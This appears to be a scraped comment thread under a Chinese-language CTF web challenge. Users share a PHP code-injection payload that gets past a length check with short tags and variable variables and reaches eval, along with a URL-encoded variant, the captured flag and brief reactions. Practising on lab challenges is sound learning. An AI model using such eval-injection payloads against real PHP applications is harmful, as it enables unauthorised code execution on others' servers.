http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333
payload: /?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111111
1、长度是年9, 2、利用短标签和替代,<?php echo $flag;?>使用短标签(<? echo $flag;?>,,再继续使用短标签替代echo ,<?= $flag;?> flag=$f=%274lag%27;$f{0}=%27f%27;?%3E%3C?=$$f;?%3E111111111111111111
flag{78062956}
好难
但是不精通php不会写,就很难受,只能看别人的writeup的payload
这题关键在于eval函数,绕过前面几个if的判断条件进入到最后一个if判断条件,由于存在eval函数,可以构造php代码执行,直接输出flag,这题有意思!!
牛皮
新知识get了
...
评论
YUMEKO 9月前
举报
http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333
Daniel2023 10月前
举报
payload: /?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111111
coo1an 1年前
举报
1、长度是年9, 2、利用短标签和替代,<?php echo $flag;?>使用短标签(<? echo $flag;?>,,再继续使用短标签替代echo ,<?= $flag;?> flag=$f=%274lag%27;$f{0}=%27f%27;?%3E%3C?=$$f;?%3E111111111111111111
110-没办法 1年前
举报
flag{78062956}
wxy1343 1年前
举报
flag{78062956}
w登临意 1年前
举报
好难
阿Q啊 2年前
举报
但是不精通php不会写,就很难受,只能看别人的writeup的payload
阿Q啊 2年前
举报
这题关键在于eval函数,绕过前面几个if的判断条件进入到最后一个if判断条件,由于存在eval函数,可以构造php代码执行,直接输出flag,这题有意思!!
哎嘿嘿1314 2年前
举报
牛皮
golangboy 2年前
举报
新知识get了